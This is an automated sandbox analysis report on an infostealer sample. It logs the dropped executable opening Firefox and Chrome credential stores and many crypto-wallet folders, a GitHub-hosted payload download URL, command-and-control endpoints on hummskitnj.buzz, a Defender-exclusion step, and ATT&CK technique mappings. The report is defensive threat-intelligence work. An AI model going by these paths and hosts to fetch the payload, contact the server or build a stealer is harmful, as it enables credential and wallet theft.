                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: Yara matchFile source: 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Mitre Att&ck Matrix (techniques grouped by tactic column; a number in front of a technique is the signature-count badge shown in the original matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 331 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 Query Registry; 321 Security Software Discovery; 1 Process Discovery; 331 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 11 File and Directory Discovery; 22 System Information Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1581343 | Sample: OiMp3TH.exe | Startdate: 27/12/2024 | Architecture: WINDOWS | Score: 100

Start
    Domains: hummskitnj.buzz; raw.githubusercontent.com; github.com
    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 8 other signatures
    Started: OiMp3TH.exe 15 5

OiMp3TH.exe
    Network: github.com 20.233.83.145, 443, 49704 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; raw.githubusercontent.com 185.199.108.133, 443, 49705 FASTLYUS Netherlands
    Dropped: C:\...\ghhqoznpon_638708802577261661.exe, PE32
    Signatures: Adds a directory exclusion to Windows Defender
    Started: ghhqoznpon_638708802577261661.exe; powershell.exe 23; powershell.exe 21

ghhqoznpon_638708802577261661.exe
    Network: hummskitnj.buzz 172.67.216.236, 443, 49706, 49707 CLOUDFLARENETUS United States
    Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 7 other signatures

powershell.exe 23
    Signatures: Loading BitLocker PowerShell Module
    Started: conhost.exe

powershell.exe 21
    Started: conhost.exe

Source | Detection | Scanner | Label
OiMp3TH.exe | 25% | Virustotal |
OiMp3TH.exe | 18% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
OiMp3TH.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | 100% | Avira | HEUR/AGEN.1314134
C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | 100% | Joe Sandbox ML |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://www.enigmaprotector.com/openU | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/uo | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/ | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/apir | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/apiz | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/apis | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/api | 100% | Avira URL Cloud | malware
https://hummskitnj.buzz/MN | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/apiP; | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/l | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz:443/apil | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/pi | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/J | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/z | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/apir$ | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz:443/api | 100% | Avira URL Cloud | malware
https://hummskitnj.buzz/apiH | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz:443/apin.txtPK | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/d | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/X? | 0% | Avira URL Cloud | safe
http://www.enigmaprotector.com/ | 0% | Avira URL Cloud | safe
https://hummskitnj.buzz/RX | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 20.233.83.145 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | high
hummskitnj.buzz | 172.67.216.236 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://hummskitnj.buzz/api | true | Avira URL Cloud: malware | unknown
hummskitnj.buzz | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
prisonyfork.buzz | false | | high
https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336785101.000000000073E000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com | OiMp3TH.exe, 00000000.00000002.4461284237.00000000032C4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hummskitnj.buzz/apiP; | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266197298.0000000000755000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266565065.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.enigmaprotector.com/openU | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hummskitnj.buzz/uo | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hummskitnj.buzz/ | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/apis | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/apir | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/MN | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286970301.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336828454.0000000003950000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290478382.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/apiz | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com | OiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hummskitnj.buzz/l | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz:443/apil | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hummskitnj.buzz/pi | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303938546.0000000000767000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/z | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/apir$ | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | OiMp3TH.exe, 00000000.00000002.4461284237.0000000003231000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hummskitnj.buzz/J | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/apiH | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hummskitnj.buzz/X? | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://raw.githubusercontent.comd | OiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://github.comd | OiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hummskitnj.buzz:443/apin.txtPK | ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                                                    high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://hummskitnj.buzz/dghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://ac.ecosia.org/autocomplete?q=ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://hummskitnj.buzz:443/apighhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://raw.githubusercontent.comOiMp3TH.exe, 00000000.00000002.4461284237.00000000032F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://raw.githubusercontent.comOiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.enigmaprotector.com/ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000001058000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
